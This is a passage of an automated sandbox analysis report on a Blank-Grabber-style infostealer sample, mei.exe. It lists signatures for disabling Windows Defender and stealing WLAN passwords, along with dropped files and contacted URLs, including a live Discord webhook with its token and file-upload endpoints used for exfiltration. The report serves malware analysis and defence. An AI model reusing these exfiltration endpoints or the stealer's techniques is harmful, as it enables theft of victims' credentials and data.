1 15->20         started        23 cmd.exe 15->23         started        25 cmd.exe 1 15->25         started        27 30 other processes 15->27 file9 signatures10 process11 signatures12 102 Suspicious powershell command line found 20->102 104 Very long command line found 20->104 106 Uses cmd line tools excessively to alter registry or file data 20->106 118 2 other signatures 20->118 43 2 other processes 20->43 108 Encrypted powershell cmdline option found 23->108 29 powershell.exe 23->29         started        32 conhost.exe 23->32         started        110 Modifies Windows Defender protection settings 25->110 112 Removes signatures from Windows Defender 25->112 34 powershell.exe 22 25->34         started        45 2 other processes 25->45 114 Adds a directory exclusion to Windows Defender 27->114 116 Tries to harvest and steal WLAN passwords 27->116 37 getmac.exe 27->37         started        39 WMIC.exe 27->39         started        41 WMIC.exe 27->41         started        47 57 other processes 27->47 process13 file14 66 C:\Users\user\AppData\...\wgovk1sp.cmdline, Unicode 29->66 dropped 49 csc.exe 29->49         started        86 Potential dropper URLs found in powershell memory 34->86 88 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 37->88 90 Writes or reads registry keys via WMI 37->90 92 DLL side loading technique detected 39->92 signatures15 process16 file17 56 C:\Users\user\AppData\Local\...\wgovk1sp.dll, PE32 49->56 dropped 52 cvtres.exe 49->52         started        process18

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              mei.exe49%VirustotalBrowse
              mei.exe100%AviraHEUR/AGEN.1351111

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr100%AviraHEUR/AGEN.1351111
              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr35%ReversingLabsWin64.Trojan.Generic
              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr49%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd3%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd3%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd3%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-console-l1-1-0.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-datetime-l1-1-0.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-debug-l1-1-0.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-errorhandling-l1-1-0.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-fibers-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-fibers-l1-1-0.dll0%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              discord.com0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://contoso.com/Icon0%URL Reputationsafe
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://oneget.orgX0%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              http://ocsp.thawte.com00%URL Reputationsafe
              https://discord.com/api/v9/users/0%Avira URL Cloudsafe
              http://www.microsoftWARNST~1PMAy.O0%Avira URL Cloudsafe
              https://api.anonfiles.com/upload0%Avira URL Cloudsafe
              http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%Avira URL Cloudsafe
              http://cacerts.digi0%Avira URL Cloudsafe
              https://bugzilla.mo0%Avira URL Cloudsafe
              https://foss.heptapod.net/pypy/pypy/-/issues/35390%Avira URL Cloudsafe
              https://api.anonfiles.com/uploadr0%Avira URL Cloudsafe
              https://discord.com/api/v9/users/0%VirustotalBrowse
              http://www.microsoftTIMES~1.JSOy.O0%Avira URL Cloudsafe
              http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%VirustotalBrowse
              https://bugzilla.mo0%VirustotalBrowse
              https://discord.com/api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1HayU_0isZXCxwisPvLSjXVC0%Avira URL Cloudsafe
              https://api.anonfiles.com/upload1%VirustotalBrowse
              https://account.bellmedia.c0%Avira URL Cloudsafe
              http://cacerts.digicert.co0%Avira URL Cloudsafe
              https://discord.com/api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1Ha0%Avira URL Cloudsafe
              https://api.anonfiles.com/uploadr2%VirustotalBrowse
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png0%Avira URL Cloudsafe
              https://foss.heptapod.net/pypy/pypy/-/issues/35390%VirustotalBrowse
              https://go.mic0%Avira URL Cloudsafe
              https://www.amazon.co.uk/0%Avira URL Cloudsafe
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz0%Avira URL Cloudsafe
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png2%VirustotalBrowse
              http://cacerts.digicert.co0%VirustotalBrowse
              https://www.amazon.co.uk/0%VirustotalBrowse
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz2%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              		162.159.136.232
              		truetrueunknown
              ip-api.com
              		208.95.112.1
              		truefalse
                		high
                blank-kwj1y.in
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://discord.com/api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1HayU_0isZXCxwisPvLSjXVCtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabmei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/Blank-c/BlankOBFmei.exe, 00000001.00000003.1673205383.000002E9141DE000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1672905829.000002E913BDA000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1673578270.000002E913BD8000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1675118927.000002E913BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://www.avito.ru/mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/ac/?q=mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://api.telegram.org/botmei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/Blank-c/Blank-Grabberimei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.microsoftWARNST~1PMAy.Omei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              https://github.com/Blank-c/Blank-Grabberrmei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.eclipse.org/bmei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#mei.exe, 00000001.00000003.1662424773.000002E9138D8000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1662545867.000002E9138D2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1662461636.000002E9138D1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2030701649.000002E911C7A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031187455.000002E9138D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.leboncoin.fr/mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://tools.ietf.org/html/rfc2388#section-4.4mei.exe, 00000001.00000003.1788725057.000002E91404C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91404B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64mei.exe, 00000001.00000002.2031187455.000002E9138D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://weibo.com/mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035981021.000002E9145F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.anonfiles.com/uploadmei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.discordapp.com/attachments/1180990520542105673/1181873826842284133/Blank-user.rar?ex=65mei.exe, 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.msn.commei.exe, 00000001.00000002.2037321445.000002E9155C8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1743684934.000001BACE158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1887513922.000001E1C14DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1887513922.000001E1C1621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://discord.com/api/v9/users/mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963mei.exe, 00000001.00000002.2035597805.000002E9141D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://cacerts.digimei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://peps.python.org/pep-0205/mei.exe, 00000001.00000003.1671398631.000002E913B2B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031449289.000002E9139D0000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1679790240.000002E913B19000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1667420967.000002E913B2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1727946923.000001BABE0E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1830961000.000001E1B1461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.amazon.ca/mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxymei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688mei.exe, 00000001.00000003.1662424773.000002E9138D8000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2030942122.000002E913518000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000038.00000002.1830961000.000001E1B168A000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • URL Reputation: malware
                                                              		unknown
                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000038.00000002.1830961000.000001E1B168A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readermei.exe, 00000001.00000003.1662424773.000002E9138D8000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1662545867.000002E9138D2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1662461636.000002E9138D1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2030701649.000002E911C7A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031187455.000002E9138D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.amazon.com/mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://github.com/python/cpython/issues/86361.mei.exe, 00000001.00000003.2028960937.000002E913B95000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031652226.000002E913B95000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1680349233.000002E913BD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1679662803.000002E913F81000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1679790240.000002E913B95000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contoso.com/Iconpowershell.exe, 00000038.00000002.1887513922.000001E1C1621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://httpbin.org/mei.exe, 00000001.00000002.2031187455.000002E9138E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0smei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlmei.exe, 00000001.00000003.1678406179.000002E913C8E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1678327780.000002E913E9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • 0%, Virustotal, Browse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016mei.exe, 00000001.00000003.1906554913.000002E914AE2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2028403305.000002E914194000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2024785294.000002E914187000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1906554913.000002E914B86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.ecosia.org/newtab/mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brmei.exe, 00000001.00000003.1761527994.000002E9140EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000038.00000002.1830961000.000001E1B168A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.gmei.exe, 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E914008000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E913FB7000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535mei.exe, 00000001.00000003.1788584216.000002E913E8D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2029359579.000002E9139B4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913E8A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913E8C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1785141429.000002E913E8D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032296817.000002E913E8D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913E8B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2029764503.000002E9139B5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031403845.000002E9139B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_symei.exe, 00000001.00000003.1662424773.000002E9138D8000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1662545867.000002E9138D2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1662461636.000002E9138D1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2030701649.000002E911C7A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031187455.000002E9138D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://MD8.mozilla.org/1/mmei.exe, 00000001.00000002.2035981021.000002E914628000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.python.org/psf/license/mei.exe, mei.exe, 00000001.00000002.2039190548.00007FFDFB6D8000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                              		high
                                                                                              http://www.eclipse.org/mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyPmei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://bugzilla.momei.exe, 00000001.00000002.2035693099.000002E914310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  • 0%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://api.anonfiles.com/uploadrmei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • 2%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://tools.ietf.org/html/rfc6125#section-6.4.3mei.exe, 00000001.00000002.2035788028.000002E9144F8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://google.com/mailmei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91401E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91401A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pymei.exe, 00000001.00000002.2031187455.000002E9138D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmmei.exe, 00000001.00000003.1678406179.000002E913C8E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1678327780.000002E913E9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.google.com/mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://foss.heptapod.net/pypy/pypy/-/issues/3539mei.exe, 00000001.00000002.2035597805.000002E9141D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              • 0%, Virustotal, Browse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031187455.000002E9138E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://google.com/mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFmei.exe, 00000001.00000003.1790066765.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1781296895.000002E9141A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.microsoftTIMES~1.JSOy.Omei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		low
                                                                                                                    https://api.gofile.io/getServerrmei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://ocsp.sectigo.com0mei.exe, 00000000.00000003.1649338725.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650835527.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651177435.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652354604.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 